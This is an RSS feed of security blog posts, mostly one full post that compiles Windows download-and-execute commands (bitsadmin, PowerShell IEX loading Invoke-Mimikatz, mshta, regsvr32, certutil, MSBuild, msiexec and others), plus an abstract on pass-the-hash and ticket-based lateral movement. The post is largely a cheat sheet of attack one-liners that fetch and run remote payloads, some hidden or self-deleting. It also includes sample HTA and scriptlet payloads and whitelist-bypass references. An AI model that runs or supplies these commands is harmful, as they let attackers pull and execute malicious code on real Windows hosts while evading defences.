<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Excalibra</title>
    <description>The latest articles on DEV Community by Excalibra (@excalibra).</description>
    <link>https://dev.to/excalibra</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2465115%2F44e01ea7-d2d5-4532-8d8a-4a94ebf19e42.jpg</url>
      <title>DEV Community: Excalibra</title>
      <link>https://dev.to/excalibra</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/excalibra"/>
    <language>en</language>
    <item>
      <title>A Comprehensive Compendium of Windows Download and Execution Commands</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 11:41:24 +0000</pubDate>
      <link>https://dev.to/excalibra/a-comprehensive-compendium-of-windows-download-and-execution-commands-3hje</link>
      <guid>https://dev.to/excalibra/a-comprehensive-compendium-of-windows-download-and-execution-commands-3hje</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Article Abstract:&lt;/strong&gt; This article presents a systematic compilation of methods for downloading and executing files on Windows systems using various built-in commands, including bitsadmin, PowerShell, mshta, and others. These techniques are applicable to Windows 7 and later versions.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;1. bitsadmin Command (Windows 7 and Above)&lt;/li&gt;
&lt;li&gt;2. PowerShell Command Download and Execution (Windows 7 and Above)&lt;/li&gt;
&lt;li&gt;3. mshta Command Download and Execution&lt;/li&gt;
&lt;li&gt;4. rundll32 Command Download and Execution&lt;/li&gt;
&lt;li&gt;5. regasm Command from .NET Framework&lt;/li&gt;
&lt;li&gt;6. CMD Remote Command Download&lt;/li&gt;
&lt;li&gt;7. regsvr32 Command Download and Execution&lt;/li&gt;
&lt;li&gt;8. certutil Command Download and Execution&lt;/li&gt;
&lt;li&gt;9. MSBuild Command from .NET Framework&lt;/li&gt;
&lt;li&gt;10. odbcconf Command Download and Execution&lt;/li&gt;
&lt;li&gt;11. cscript Script Remote Command Download and Execution&lt;/li&gt;
&lt;li&gt;12. pubprn.vbs Download and Execution Command&lt;/li&gt;
&lt;li&gt;13. Native Windows copy Command&lt;/li&gt;
&lt;li&gt;14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)&lt;/li&gt;
&lt;li&gt;15. IEExec Command Download and Execution&lt;/li&gt;
&lt;li&gt;16. msiexec Command Download and Execution&lt;/li&gt;
&lt;li&gt;17. GreatSCT Download and Execution Project&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  1. bitsadmin Command (Windows 7 and Above)
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;bitsadmin&lt;/code&gt; utility can only download files to a specified path on the local system.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bitsadmin /transfer myDownLoadJob /download /priority normal &lt;span class="s2"&gt;"http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg"&lt;/span&gt; &lt;span class="s2"&gt;"d:&lt;/span&gt;&lt;span class="se"&gt;\a&lt;/span&gt;&lt;span class="s2"&gt;bc.jpg"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bitsadmin /transfer d90f &amp;lt;http://site.com/a&amp;gt; %APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe&amp;amp;%APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe&amp;amp;del %APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  2. PowerShell Command Download and Execution (Windows 7 and Above)
&lt;/h2&gt;

&lt;p&gt;PowerShell provides powerful capabilities for downloading and executing scripts and binaries directly from remote sources.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell IEX &lt;span class="o"&gt;(&lt;/span&gt;New-Object Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.DownloadString&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'&amp;lt;https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1&amp;gt;'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; Invoke-Mimikatz
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="nt"&gt;-exec&lt;/span&gt; bypass &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.ps1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="o"&gt;(&lt;/span&gt;new-object System.Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.DownloadFile&lt;span class="o"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'http://192.168.168.183/1.exe'&lt;/span&gt;,&lt;span class="s1"&gt;'C:\1111111111111.exe'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="nt"&gt;-w&lt;/span&gt; hidden &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;new-object System.Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.Downloadfile&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg'&lt;/span&gt;,&lt;span class="s1"&gt;'d:\\1.jpg'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  3. mshta Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;mshta&lt;/code&gt; command executes HTML Application (HTA) files, which can contain VBScript or JScript that performs download and execution.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mshta vbscript:Close&lt;span class="o"&gt;(&lt;/span&gt;Execute&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"GetObject(""script:http://webserver/payload.sct"")"&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;

mshta http://webserver/payload.hta

mshta &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.hta
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample payload.hta:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;HTML&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;http-equiv=&lt;/span&gt;&lt;span class="s"&gt;"Content-Type"&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;"text/html; charset=utf-8"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;HEAD&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;script &lt;/span&gt;&lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"VBScript"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="nx"&gt;Window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ReSizeTo&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="nx"&gt;Window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;moveTo&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;2000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;2000&lt;/span&gt;
&lt;span class="nb"&gt;Set&lt;/span&gt; &lt;span class="nx"&gt;objShell&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;CreateObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Wscript.Shell&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;objShell&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Run&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;calc.exe&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
&lt;span class="nb"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;close&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
demo
&lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/HEAD&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/HTML&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  4. rundll32 Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;rundll32&lt;/code&gt; utility can execute functions exported from DLLs, including those hosted on remote WebDAV shares.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;rundll32 &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.dll,entrypoint

rundll32.exe javascript:&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;.&lt;/span&gt;&lt;span class="se"&gt;\m&lt;/span&gt;&lt;span class="s2"&gt;shtml,RunHTMLApplication"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nv"&gt;o&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;GetObject&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"script:http://webserver/payload.sct"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;window.close&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://github.com/3gstudent/Javascript-Backdoor" rel="noopener noreferrer"&gt;https://github.com/3gstudent/Javascript-Backdoor&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  5. regasm Command from .NET Framework
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;regasm.exe&lt;/code&gt; tool, part of the .NET Framework, can be used to execute managed DLLs from remote locations.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\r&lt;/span&gt;egasm.exe /u &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  6. CMD Remote Command Download
&lt;/h2&gt;

&lt;p&gt;The Windows Command Prompt can directly read and execute commands from a remote batch file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cmd.exe /k &amp;lt; &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\b&lt;/span&gt;atchfile.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  7. regsvr32 Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;regsvr32&lt;/code&gt; utility can register and execute COM objects from remote scriptlet files.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:&lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.sct scrobj.dll

regsvr32 /u /s /i:&amp;lt;http://site.com/js.png&amp;gt; scrobj.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample js.png (Scriptlet):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?XML version="1.0"?&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;scriptlet&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;registration&lt;/span&gt;
    &lt;span class="na"&gt;progid=&lt;/span&gt;&lt;span class="s"&gt;"ShortJSRAT"&lt;/span&gt;
    &lt;span class="na"&gt;classid=&lt;/span&gt;&lt;span class="s"&gt;"{10001111-0000-0000-0000-0000FEEDACDC}"&lt;/span&gt; &lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="c"&gt;&amp;lt;!-- Learn from Casey Smith @subTee --&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;script&lt;/span&gt; &lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"JScript"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="cp"&gt;&amp;lt;![CDATA[
            ps = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/registration&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/scriptlet&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  8. certutil Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;certutil&lt;/code&gt; utility, primarily used for certificate management, can also download files and decode Base64-encoded content.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload payload
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload.b64 payload.b64 &amp;amp; certutil &lt;span class="nt"&gt;-decode&lt;/span&gt; payload.b64 payload.dll &amp;amp; C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil /logfile&lt;span class="o"&gt;=&lt;/span&gt; /LogToConsole&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;false&lt;/span&gt; /u payload.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload.b64 payload.b64 &amp;amp; certutil &lt;span class="nt"&gt;-decode&lt;/span&gt; payload.b64 payload.exe &amp;amp; payload.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://site.com/a a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; del a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://192.168.254.102:80/a delete
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  9. MSBuild Command from .NET Framework
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;MSBuild&lt;/code&gt; tool, part of the .NET Framework, can execute tasks defined in XML project files, enabling remote code execution.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cmd /V /c &lt;span class="s2"&gt;"set MB="&lt;/span&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\M&lt;/span&gt;SBuild.exe&lt;span class="s2"&gt;" &amp;amp; !MB! /noautoresponse /preprocess &lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;webdavserver&lt;/span&gt;&lt;span class="se"&gt;\f&lt;/span&gt;&lt;span class="s2"&gt;older&lt;/span&gt;&lt;span class="se"&gt;\p&lt;/span&gt;&lt;span class="s2"&gt;ayload.xml &amp;gt; payload.xml &amp;amp; !MB! payload.xml"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  10. odbcconf Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;odbcconf&lt;/code&gt; utility can be used to register DLLs remotely via its &lt;code&gt;regsvr&lt;/code&gt; command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;odbcconf /s /a &lt;span class="o"&gt;{&lt;/span&gt;regsvr &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload_dll.txt&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  11. cscript Script Remote Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;cscript&lt;/code&gt; command executes VBScript or JScript scripts, which can be hosted remotely.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript //E:jscript &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample downfile.vbs:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;' Set your settings
strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"

' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary

    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start

    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Execution Command:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript downfile.vbs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  12. pubprn.vbs Download and Execution Command
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;pubprn.vbs&lt;/code&gt; script, part of Windows printing administration, can execute remote scriptlet files.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript /b C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\S&lt;/span&gt;ystem32&lt;span class="se"&gt;\P&lt;/span&gt;rinting_Admin_Scripts&lt;span class="se"&gt;\z&lt;/span&gt;h-CN&lt;span class="se"&gt;\p&lt;/span&gt;ubprn.vbs 127.0.0.1 script:&amp;lt;https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  13. Native Windows copy Command
&lt;/h2&gt;

&lt;p&gt;The built-in &lt;code&gt;copy&lt;/code&gt; and &lt;code&gt;xcopy&lt;/code&gt; commands can copy files from remote SMB shares.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;copy &lt;span class="se"&gt;\\&lt;/span&gt;x.x.x.x&lt;span class="se"&gt;\x&lt;/span&gt;x&lt;span class="se"&gt;\p&lt;/span&gt;oc.exe
xcopy d:&lt;span class="se"&gt;\t&lt;/span&gt;est.exe &lt;span class="se"&gt;\\&lt;/span&gt;x.x.x.x&lt;span class="se"&gt;\t&lt;/span&gt;est.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)
&lt;/h2&gt;

&lt;p&gt;Internet Explorer can be launched from the command line to access a remote URL, potentially triggering a vulnerability.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="s2"&gt;"C:&lt;/span&gt;&lt;span class="se"&gt;\P&lt;/span&gt;&lt;span class="s2"&gt;rogram Files&lt;/span&gt;&lt;span class="se"&gt;\I&lt;/span&gt;&lt;span class="s2"&gt;nternet Explorer&lt;/span&gt;&lt;span class="se"&gt;\I&lt;/span&gt;&lt;span class="s2"&gt;EXPLORE.EXE"&lt;/span&gt; &amp;lt;http://site.com/exp&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  15. IEExec Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;IEExec.exe&lt;/code&gt;, part of the .NET Framework, can execute managed code from remote locations.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&amp;gt; caspol &lt;span class="nt"&gt;-s&lt;/span&gt; off
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&amp;gt; IEExec &amp;lt;http://site.com/files/test64.exe&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/" rel="noopener noreferrer"&gt;https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  16. msiexec Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;msiexec&lt;/code&gt; installer can execute MSI packages hosted on remote servers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msiexec /q /i &amp;lt;http://site.com/payloads/calc.png&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  17. GreatSCT Download and Execution Project
&lt;/h2&gt;

&lt;p&gt;GreatSCT is a project that provides various techniques for bypassing application whitelisting and executing payloads.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://github.com/GreatSCT" rel="noopener noreferrer"&gt;https://github.com/GreatSCT&lt;/a&gt;&lt;/p&gt;

</description>
      <category>windows</category>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Domain Lateral Movement: PTH, PTK, and PTT Hash-Based Credential Transfer</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 11:09:24 +0000</pubDate>
      <link>https://dev.to/excalibra/domain-lateral-movement-pth-ptk-and-ptt-hash-based-credential-transfer-313c</link>
      <guid>https://dev.to/excalibra/domain-lateral-movement-pth-ptk-and-ptt-hash-based-credential-transfer-313c</guid>
      <description>&lt;p&gt;&lt;strong&gt;Abstract:&lt;/strong&gt; This article delineates the operational workflow of the Kerberos protocol within a domain environment, including the process by which a client obtains a Ticket-Granting Ticket (TGT) and its significance in intranet security. It critically examines three lateral movement techniques—Pass the Hash (PTH), Pass the Ticket (PTT), and Pass the Key (PTK)—and evaluates the ramifications of NTLM and LM Hash authentication on Windows systems. The discussion extends to the security patch KB2871997, designed to mitigate PTH attacks. Through case studies, the utilisation of the Mimikatz tool for credential extraction and injection is demonstrated, alongside an analysis of the MS14-068 vulnerability and the concepts of Golden and Silver Tickets. The practical application of the Ladon intranet penetration testing framework for information gathering and lateral movement is also considered.&lt;/p&gt;

